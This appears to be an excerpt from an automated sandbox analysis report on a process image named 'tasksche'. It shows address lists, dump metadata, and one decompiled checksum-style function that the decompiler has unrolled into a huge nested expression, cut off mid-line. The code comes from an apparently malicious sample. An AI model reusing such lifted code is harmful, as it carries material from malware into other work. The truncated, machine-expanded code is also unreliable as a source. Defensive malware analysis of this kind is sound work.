                                                          0x00404e7e
                                                          0x00404e8c
                                                          0x00404e8f
                                                          0x00404e98
                                                          0x00000000
                                                          0x00404f61
                                                          0x00404f64
                                                          0x00404f67
                                                          0x00404f6f
                                                          0x00404f6f
                                                          0x00404f72
                                                          0x00404f79
                                                          0x00404f7c
                                                          0x00000000
                                                          0x00404d9b
                                                          0x00404d11
                                                          0x00404d13
                                                          0x00404d13
                                                          0x00404d17
                                                          0x00404d1a
                                                          0x00404d1b
                                                          0x00404d1b
                                                          0x00000000
                                                          0x00404cd4
                                                          0x00404cd4
                                                          0x00404cd8
                                                          0x00404cd8
                                                          0x00404cda
                                                          0x00000000
                                                          0x00000000
                                                          0x00404ce0
                                                          0x00404ce1
                                                          0x00404ce4
                                                          0x00404ce8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404ce8
                                                          0x00404e10
                                                          0x00404e10
                                                          0x00404f9a
                                                          0x00404f9a
                                                          0x00000000
                                                          0x00404f9a
                                                          0x00404cd2
                                                          0x00404c77
                                                          0x00404c7c
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
                                                          • Instruction ID: 9637f4fcf05056c634a246d4ec164b1eccd92df816b65a9601eba7856632ad8a
                                                          • Opcode Fuzzy Hash: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
                                                          • Instruction Fuzzy Hash: 36D1F5B1A002199FDF14CFA9D9805EDBBB1FF88314F25826AD959B7390D734AA41CB84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040541F(signed int _a4, signed char* _a8, unsigned int _a12) {
                                                          				signed int _t35;
                                                          				signed char* _t73;
                                                          				signed char* _t74;
                                                          				signed char* _t75;
                                                          				signed char* _t76;
                                                          				signed char* _t77;
                                                          				signed char* _t78;
                                                          				signed char* _t79;
                                                          				unsigned int _t85;
                                                          
                                                          				_t73 = _a8;
                                                          				if(_t73 != 0) {
                                                          					_t35 =  !_a4;
                                                          					if(_a12 >= 8) {
                                                          						_t85 = _a12 >> 3;
                                                          						do {
                                                          							_a12 = _a12 - 8;
                                                          							_t74 =  &(_t73[1]);
                                                          							_t75 =  &(_t74[1]);
                                                          							_t76 =  &(_t75[1]);
                                                          							_t77 =  &(_t76[1]);
                                                          							_t78 =  &(_t77[1]);
                                                          							_t79 =  &(_t78[1]);
                                                          							_t35 = ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008 ^  *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + 